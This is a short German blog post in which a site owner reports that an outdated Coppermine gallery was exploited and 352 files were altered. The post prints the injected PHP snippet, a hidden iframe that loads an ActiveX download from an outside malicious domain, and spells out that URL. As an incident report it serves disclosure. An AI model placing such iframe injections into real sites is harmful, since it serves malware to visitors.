Seit gestern Nachmittag war der Navision-Blog eine zeitlang tot, da er Opfer eines Hackerangriffs war. Offenbar wurde eine Schwachstelle (Exploit “Coppermine Photo Gallery <= 1.4.3 remote commands execution”) in der Coppermine Gallery ausgenutzt. Im Ergebnis wurden min. 352 Dateien manipuliert. Diese sorgten dafür das beim Anschauen der Seite mit dem Internet Explorer über einen iFrame ein ActiveX-Plugin nachgeladen werden sollte. Ich kenne die Auswirkungen des “Plugins” nicht, aber ich hoffe das hat keiner installiert.
Die betroffenen Dateien sahen alle ungefähr so aus:
<?php
if($GLOBALS[“fx”]==0) {
$GLOBALS[“fx”]=1;
echo “<iframe src=’http://ccf
elomvhk.co
m/dl/adv542
.php’ width=1 height=1></iframe>”;
}
?><?php
if($GLOBALS[“fx”]==0) {
$GLOBALS[“fx”]=1;
echo “<iframe src=’http://ccf
elomvhk.co
m/dl/adv542
.php’ width=1 height=1></iframe>”;
}
?>
Die kryptische Url bedeutet: http://ccfelomvhk.com/dl/adv542.php
Ich habe jetzt erst einmal eine Sicherung eingespielt und versuche die Coppermine Gallery zu updaten. Ich bin ja selber schuld: Ich habe versucht mein WordPress immer aktuell zu halten, aber an die Gallery habe ich nicht gedacht. Die hat noch eine uralte Versionsnummer.
Weitere Informationen:
Nachtrag: Als Konsequenz aus dem Angriff habe ich mich entschieden die Coppermine Galerie abzuschalten und zukünftig nur noch über meinen Flickr-Account zu arbeiten.
Tags: Coppermine, Exploit, Hacker, Iframe, wordpress
[…] ich meine Coppermine Gallery aufgrund von Sicherheitsproblemen deinstalliert habe, habe ich begonnen meine Google Maps Plugin an Flickr anzubinden. Hier ein erster […]
Pingback by Flickr Anbindung an Google Maps » Blog der Microsoft .NET / Dynamics NAV - Group Halle — Saturday, 19. April 2008 um 12:52 Uhr